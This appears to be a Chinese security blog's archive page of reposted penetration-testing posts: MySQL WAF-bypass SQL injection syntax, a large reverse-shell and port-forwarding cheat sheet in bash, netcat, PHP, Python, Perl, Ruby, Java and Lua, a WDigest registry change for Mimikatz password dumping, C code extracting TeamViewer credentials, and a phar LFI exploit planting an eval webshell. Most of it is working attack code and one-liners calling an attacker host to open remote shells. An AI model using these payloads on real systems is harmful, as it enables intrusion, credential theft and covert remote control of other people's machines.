通用的关于sql注入的绕过waf的技巧(利用mysql的特性)

发布时间:June 16, 2015 // 分类:运维工作,工作日志,代码学习,转帖文章 // No Comments

直接上语法

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。

另外根据官方文档我们可以看到\N其实相当于NULL字符,利用这个特性可以绕过很多waf。

9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is \N (case sensitive).

渗透测试:反弹与转发小结

发布时间:June 16, 2015 // 分类:linux,转帖文章 // No Comments

0x00 前言

在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.

0x01 反弹shell
1) Bash

部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口

bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
2) NetCat

Netcat反弹shell也是常用兵器,经典命令参数-e

nc -e /bin/sh x.x.x.x 2333

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

或者本地监听两个端口,通过管道,一处输入,一处输出

nc x.x.x.x 2333|/bin/sh|nc x.x.x.x 2444

其他方式基本沿用以上思路,如将nc更换为telnet等

mknod backpipe p && telnet x.x.x.x 2333 0<backpipe | /bin/bash 1>backpipe
3) PHP

PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell

<?php 
function which($pr) { 
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 

function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 

$yourip = "x.x.x.x"; 
$yourport = "2333"; 
$usedb = array('perl'=>'perl','c'=>'c');    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

访问,成功返回

但需要注意php需未禁用exec函数.另外,Metasploit的payload也提供各种反弹脚本,如

msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

生成文件内容像这样

将文件传入shell中,在msf中开一个handler

msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 2333
msf exploit(handler) > exploit

此时访问re.php,即可反弹到本地一个shell

当然,用nc直接监听端口也是可以的

其他可以考虑使用msf编码变形等,github也有这样一个脚本
https://github.com/keshy/cwg_tools/blob/master/php-reverse-shell.php
可供参考

4) JSP

JSP类似,使用msf生成一个反弹shell

msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

然后在msf中开一个handler

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
msf exploit(handler) > exploit

类似方法即可反弹回shell

5) Python

一个Python反弹shell的代码demo

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

整洁规范的Python写法应该像是这样,更易懂些:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",2333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

其他脚本像这样子

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('x.x.x.x',2333))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

msf的payload给出这样的解法

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=2333

生成编码后文件:

import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))

Base64解码后:

import socket,struct
s=socket.socket(2,1)
s.connect(('x.x.x.x',2333))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})

此处补充上phith0n同学的正向连接bind_shell

关于交互式正向连接shell,几点需要注意的地方

1.不管在linux还是windows下,想要做到交互式,只能开启一个shell.不能够每次接收到命令就再开启一个shell进程,然后执行.

2.windows下cmd.exe /K参数是保持cmd不结束,/c参数是执行完后就结束,注意区别.

最终Win版本:

from socket import *
import subprocess
import os, threading

def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',23333))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        t = threading.Thread(target = send, args = (talk, proc))
        t.setDaemon(True)
        t.start()
        while True:
                cmd=talk.recv(1024)
                proc.stdin.write(cmd)
                proc.stdin.flush()
        server.close()

Linux版本:

from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',11))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen(["/bin/sh","-i"],stdin=talk,stdout=talk, stderr=talk, shell=True)

执行后主动连接即可

6) Perl

首先给一个原理类似的脚本

perl -e 'use Socket;$i="x.x.x,x";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

然后是一个不依赖调用/bin/bash的方法

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

一个完整的反弹pl脚本

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell.  Change these.
my $ip = 'x.x.x.x';
my $port = 2333;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();    
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

ASP环境下调用perlscript执行方式

<%@Language=PerlScript%>
#表明ASP脚本使用语言为Perlscript
<%
system("c://Recycler//cmd.exe /c c://Recycler//nc.exe -e cmd.exe -v x.x.x.x 443");
#用system函数执行命令的方式
#exec("c://Recycler//cmd.exe /c c://Recycler//nc.exe -e cmd.exe -v x.x.x.x 443");
#用exec函数执行命令的方式
%>
7) Ruby

惯例,首先一个调用/bin/sh的

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",2333).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

一个不依赖于/bin/sh的反弹shell:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Windows环境使用

ruby -rsocket -e 'c=TCPSocket.new("x.x.x.x","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

此外MSF中也有相应模块可以调用,就不多提

8) Java

给出一个调用/bin/bash的脚本

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/2333;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

MSF中也有相应模块可以调用

9) Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','2333');os.execute('/bin/sh -i <&3 >&3 2>&3');"

类似不做解释

0x02 端口转发

上面总结反弹shell的各种已知主流或非主流方式,下面扯一下端口转发.
已知的大众方式如:

  • lcx老牌工具
  • htran/fport/fpipe等
  • antifw修改3389端口为80
  • reduh提供了借助http/https隧道连接3389的另一种方式
  • tunna给出了比reduh更稳定快速的解决方法

在Linux环境下,则可考虑借助脚本实现,如Perl/Python等.
知道创宇Knownsec曾给出一个rtcp.py脚本做转发之用,不过测试发现只支持单点连接,推荐使用此脚本,支持多client同时连接

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import socket
import threading
import logging
import optparse


class PipeThread(threading.Thread):

    def __init__(self, source_fd, target_fd):
        super(PipeThread, self).__init__()
        self.logger = logging.getLogger('PipeThread')
        self.source_fd = source_fd
        self.target_fd = target_fd
        self.source_addr = self.source_fd.getpeername()
        self.target_addr = self.target_fd.getpeername()

    def run(self):
        while True:
            try:
                data = self.source_fd.recv(4096)
                if len(data) > 0:
                    self.logger.debug('read  %04i from %s:%d', len(data),
                                      self.source_addr[0], self.source_addr[1])
                    sent = self.target_fd.send(data)
                    self.logger.debug('write %04i to   %s:%d', sent,
                                      self.target_addr[0], self.target_addr[1])
                else:
                    break
            except socket.error:
                break
        self.logger.debug('connection %s:%d is closed.', self.source_addr[0],
                          self.source_addr[1])
        self.logger.debug('connection %s:%d is closed.', self.target_addr[0],
                          self.target_addr[1])
        self.source_fd.close()
        self.target_fd.close()


class Forwarder(object):

    def __init__(self, ip, port, remoteip, remoteport, backlog=5):
        self.remoteip = remoteip
        self.remoteport = remoteport
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((ip, port))
        self.sock.listen(backlog)

    def run(self):
        while True:
            client_fd, client_addr = self.sock.accept()
            target_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            target_fd.connect((self.remoteip, self.remoteport))

            threads = [
                PipeThread(client_fd, target_fd),
                PipeThread(target_fd, client_fd)
            ]

            for t in threads:
                t.setDaemon(True)
                t.start()

    def __del__(self):
        self.sock.close()


if __name__ == '__main__':
    parser = optparse.OptionParser()

    parser.add_option(
        '-l', '--local-ip', dest='local_ip',
        help='Local IP address to bind to')
    parser.add_option(
        '-p', '--local-port',
        type='int', dest='local_port',
        help='Local port to bind to')
    parser.add_option(
        '-r', '--remote-ip', dest='remote_ip',
        help='Local IP address to bind to')
    parser.add_option(
        '-P', '--remote-port',
        type='int', dest='remote_port',
        help='Remote port to bind to')
    parser.add_option(
        '-v', '--verbose',
        action='store_true', dest='verbose',
        help='verbose')
    opts, args = parser.parse_args()

    if len(sys.argv) == 1 or len(args) > 0:
        parser.print_help()
        exit()

    if not (opts.local_ip and opts.local_port and opts.remote_ip and opts.remote_port):
        parser.print_help()
        exit()

    if opts.verbose:
        log_level = logging.DEBUG
    else:
        log_level = logging.CRITICAL

    logging.basicConfig(level=log_level, format='%(name)-11s: %(message)s')
    forwarder = Forwarder(opts.local_ip, opts.local_port, opts.remote_ip, opts.remote_port)

    try:
        forwarder.run()
    except KeyboardInterrupt:
        print 'quit'
        exit()

使用方式如

python xxx.py -l 0.0.0.0 -p 3389 -r x.x.x.x -P 443

至于Perl脚本,网络中也有相关资料,大家可自行修改使用.

0x03 开放代理

如果对目标服务器已获得较高权限,可添加vpn或socks代理,ringzero@557.im写的
一个可用socks.py脚本可以更易的完成socks代理添加
使用方式如:

nohup python s5.py 1080 &

只有Webshell的情况下,又需要对内网某web服务进行访问测试,但没有充足的精力手工借助webshell进行请求,需要将这一过程自动化,xsjswt给出这样一种思路.

将如下脚本以shell权限丢至服务器

<?php
if(!isset($_GET['url'])){
  exit(0);
}
$ch = curl_init();
$url=$_GET['url'];
if(strstr($url,'?')){
  $url.='&';
}
else{
  $url.='?';
}
unset($_GET['url']);
foreach($_GET as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $url=$url.'&'.$Key.'='.urlencode($Val);
}
$cookie='';
foreach($_COOKIE as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $cookie=$cookie.$Key.'='.urlencode($Val).'; ';
}
if($_SERVER['REQUEST_METHOD']=="POST"){
  curl_setopt($ch, CURLOPT_POST, 1);
  $post_data='';
  foreach($_POST as $Key=>$Val){
    if(get_magic_quotes_gpc()){
      $Val=stripslashes($Val);
    }
    $post_data=$post_data.'&'.$Key.'='.urlencode($Val);
  }
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
if(isset($_SERVER['HTTP_REFERER'])){
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);
}
$Response=curl_exec($ch);
if(!$Response){
  curl_close($ch);
  exit(0);
}
$HttpStatus=curl_getinfo($ch,CURLINFO_HTTP_CODE);
$Header=substr($Response,0,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Body=substr($Response,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Headers=split("\r\n",$Header);
foreach($Headers as $ThusHead){
  if($ThusHead == 'Transfer-Encoding: chunked' || strstr($ThusHead,'Content-Length')!==false){
     continue;
  }
  header($ThusHead,FALSE);
}
echo $Body;
curl_close($ch);
?>

另搭建一nginx服务器,添加如下配置

server {
    listen          监听端口;
    location ~ () {
            proxy_pass              http://shell-ip/文件存放目录/proxy.php?url=http://$host/$request_uri;
            proxy_set_header        Host    "访问webshell所用域名";
    }
}

重新加载nginx配置,本地浏览器http代理设置为nginx服务器ip及监听端口,即可实现初步的代理请求.

0x04 小结

仅总结常见手法/工具/脚本并加以测试,如各位实战中有奇葩的环境/更有趣的思路/手法,望不吝赐教.

0x05 参考资料

[1] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

[2] http://www.leavesongs.com/PYTHON/python-shell-backdoor.html

[3] http://www.waitalone.cn/linux-shell-rebound-under-way.html

[4] http://tool.p1ng.pw/getshell.html

[5] 互联网其他相关资料

Dumping WDigest Creds with Meterpreter Mimikatz/Kiwi in Windows 8.1

发布时间:June 11, 2015 // 分类:windows,转帖文章 // No Comments

Many of us in the penetration testing world have come to love Benjamin Delpy’s (blog.gentilkiwi.com) mimikatz/kiwi modules which were ported to Metasploit by OJ Reeves and incorporated into the meterpreter shell. Among other capabilities, one of the most impactful features of these modules was the ability to extract a Windows user’s clear text password from the WDigest provider.

When Microsoft released Windows 8.1, they added some security features that effectively removed the ability of tools like mimikatz or WCE to dump clear text credentials from LSA memory.

Microsoft then backported those fixes in a security update (http://support.microsoft.com/kb/2871997) for Windows systems prior to 8.1. However, because WDigest is used by many products (e.g. IIS), Microsoft left the Wdigest provider enabled which is why our mimikatz/kiwi module can still obtain clear text passwords prior to Windows 8.1

Windows 8.1 introduced a registry setting that allows for disabling the storage of the user’s logon credential in clear text for the WDigest provider.

(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential)

Although the entry does not appear in the Windows 8.1 registry, the default setting for this DWORD value in 8.1 is “0” meaning that 8.1 does not store logon credentials in clear text in LSA memory for this SSP.

KB2871997 backported this registry setting to earlier Windows versions. When you install the hotfix, the registry setting will also not appear in earlier versions. These versions < 8.1 will default to “1” for the “UseLogonCredential” DWORD value.

So what happens on a Windows 8.1 system when we try to obtain the clear text password via a meterpreter shell using the mimikatz or kiwi modules?

The kiwi module is unable to obtain the clear text passwords from LSA memory.

But since we have administrative access, let’s change the registry setting by explicitly setting it to 1 in a Windows shell.

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)

We refresh the regedit window to see the new value of “1” for UseLogonCredential.

Now, all we have to do is try to force, or wait for the user to either lock their screen or log off and then subsequently unlock their screen or log back in.

With the update to the registry, we should now be able to grab the clear text password from LSA memory.

Back in our meterpreter shell, we attempt the creds_wdigest again (might have to get a new meterpreter shell if the user logged off and back on).

References:

http://blog.gentilkiwi.com
http://blogs.technet.com/b/kfalde/archive/2014/11/01/kb2871997-and-wdigest-part-1.aspx

 

咱们来说人话。修改注册表 ,将 HKLM_LOCAL_MACHEINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"(需要添加该 项目)设置为1,类型为DWORD 32  就可以了,然后等管理员在线或者还没注销的时候,就可以用mimi抓取明文了。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

获取运行中的TeamViewer的账号和密码

发布时间:June 10, 2015 // 分类:运维工作,工作日志,代码学习,VC/C/C++,转帖文章 // 1 Comment

Dumps TeamViewer ID,Password and account settings from a running TeamViewer instance by enumerating child windows.

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <iostream>
#pragma comment( lib, "kernel32" )
#pragma comment( lib, "user32" )
 
int status = 0;
 
BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)
        {
                status = 1;
                printf("TeamViewer ID: ");
        }
       
        if (strstr(BufferContent, "Please tell your partner") != NULL)
        {
                status = 1;
                printf("TeamViewer PASS: ");
        }
 
        return 1;
}
 
BOOL CALLBACK EnumAccountWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "E-mail") != NULL)
        {
                status = 1;
                printf("E-mail: ");
        }
       
        if (strstr(BufferContent, "Password") != NULL)
        {
                status = 1;
                printf("Password: ");
        }
 
        return 1;
}
 
 
int main()
{
        HWND hwndTeamViewer = FindWindow(NULL, "TeamViewer");
 
        if (hwndTeamViewer)
        {
                EnumChildWindows(hwndTeamViewer, EnumMainTVWindow, 0);
        }
       
       
        HWND hwndAccount = FindWindow(NULL, "Computers & Contacts");
 
        if (hwndAccount)
        {
                EnumChildWindows(hwndAccount, EnumAccountWindow, 0);
        }
 
       
        return 0;
}
C:\tools\Projects>TeamViewer_Dump.exe
TeamViewer ID: 606 151 261
TeamViewer PASS: 3239
E-mail: hacked@account.com
Password: FooPassword123

C:\tools\Projects>

php phar LFI

发布时间:June 9, 2015 // 分类:PHP,代码学习,转帖文章 // No Comments

0x01. 什么是phar

文件归档到一个文件包。
将一个模块的文件打包成一个phar,这样方便模块整体迁移,只需将phar文件移动过去,其他环境中include即可使用。
类似于java的 .jar 文件。
php 5.3时,为php的C语言扩展,安装php时会默认安装。

0x02. 创建phar文件

phar.readonly = Off 这个参数必须设置为Off,如果为On,表示phar文档不可写。

makephar.php

<?php

try{
    $p = new Phar("my.phar", 0, 'my.phar');
} catch (UnexpectedValueException $e) {
    die('Could not open my.phar');
} catch (BadMethodCallException $e) {
    echo 'technically, this cannot happen';
}

$p->startBuffering();
$p['file1.txt'] = 'file1'; 
$p['file2.txt'] = 'file2';
$p['file3.txt'] = 'file3';
$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';

// use my.phar
echo file_get_contents('phar://my.phar/file2.txt');  // echo file2

// make a file named my.phar
$p->setStub("<?php
    Phar::mapPhar('myphar.phar');  
__HALT_COMPILER();");

$p->stopBuffering();

?>

上面代码生成一个my.phar文件,代码输出file2字符串。

my.phar文件包含了file1.txt,file2.txt,file3.txt和shell.php这四个文件。当然了,这四个文件不是真实存在磁盘上。

注意:这几个文件不能直接通过http访问,但可以被include和file_get_contents等php函数利用。

0x03. 利用phar

在makephar.php文件的当前目录,新建一个callphar.php,利用phar特定的格式。

<?php
include 'phar://my.phar/shell.php';
?>

访问callphar.php即可调用shell.php

注意:phar文件不受文件名限制,即my.char可以任意的重命名为aaa.bbb

callphar.php

<?php
include 'phar://aaa.bbb/shell.php';
?>

1

0x04. LFI漏洞代码及利用

upload.php

<?php

if(isset($_POST['submit'])){
    $upload_name = $_FILES['file']['name'];
    $tempfile = $_FILES['file']['tmp_name'];
    $upload_ext = trim(get_extension($upload_name)); 

    $savefile = RandomString() . '.txt';
    if ($upload_ext == 'txt') {
            if(move_uploaded_file($tempfile,$savefile)) {
                die('Success upload. FileName: '.$savefile);
            }
            else {
                die('Upload failed..');
            }
    }
    else {
        die('You are not a txt file..');
    }

}
function get_extension($file){
    return strtolower(substr($file, strrpos($file, '.')+1));    
}

function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0; $i < 16; $i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}

// make a lfi vulnerability
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>


<html>
    <body>
        <form method="post" action="#" enctype="multipart/form-data">
            <input type="file" name="file" value=""/>
            <input type="submit" name="submit" value="upload"/>
        </form>
    </body>
</html>

上面代码只能上传txt文件,并且可以include php后缀名的文件。

利用:
将makephar.php生成的my.char重命名为phar.txt,并且上传。

2

所以POC为:
http://localhost/pentest/web200/upload.php?file=phar://S9EvthZuJI1TC4u5.txt/shell

3

0x5 参考

http://blog.csdn.net/yonggang7/article/details/24142725
http://drops.wooyun.org/papers/4544

PentestBox:一个基于Windows系统的渗透测试平台

发布时间:June 7, 2015 // 分类:工作日志,windows,转帖文章 // No Comments

Welcome to PentestBox Tools List Website!
Here you will find list of the tools which are inside PentestBox and how to use them. 
You can see list of tools of particular category using the left sidebar.

Suppose you want to use SQLMap, you can find it's description below in Web Application Scanner Section and you will find something like given below

  cmd.exe

C:\Users\Aditya Agrawal\Desktop

$sqlmap

The console above with sqlmap in it tells that if you need to use SQLmap then sqlmap is the alias for it. If you are not aware with the tool and it's functions then type like sqlmap -h on console, it will display all possible functions of that tool , sqlmap in our case.

 

To keep everything in short, below are only aliases of the respective tool. 
I Hope you will Enjoy using PentestBox :)

Web Vulnerability Scanners

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: PortsWigger
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $burp

  • Commix - Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. 
    Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $commix

  • fimap - fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. 
    Author: Iman Karim 
    License: GPLv2
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $fimap

  • Grabber - Grabber is a web application scanner. Basically it detects some kind of vulnerabilities in your website. Grabber is simple, not fast but portable and really adaptable. This software is designed to scan small websites such as personals, forums etc. absolutely not big application: it would take too long time and flood your network. 
    Author: Romain Gaucher 
    License: BSD
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $grabber

  • Golismero - GoLismero is an open source framework for security testing. It's currently geared towards web security, but it can easily be expanded to other kinds of scans.
    License: GPLv2 
    Author: Daniel García , Mario Vilas, Raúl Requero 
    License: GPLv2
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $golismero

      cmd.exe

    C:\PentestBox\bin\WebApplications\golismero (master)

    $golismero.bat scan pentestbox.com

  • IronWasp - Find security issues on your website automatically using IronWASP, one of the world's best web security scanners. Here are some reasons why IronWASP is great:
    • It's Free and Open source
    • GUI based and very easy to use, no security expertise required
    • Powerful and effective scanning engine
    • Supports recording Login sequence
    • Checks for over 25 different kinds of well known web vulnerabilities
    • False Negatives detection suppport
    • Industry leading built-in scripting engine that supports Python and Ruby

    Author: Lavakumar Kuppan
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $ironwasp

  • jSQL - jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). 
    Author: ron190 
    License: GPLv3
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $jSQL

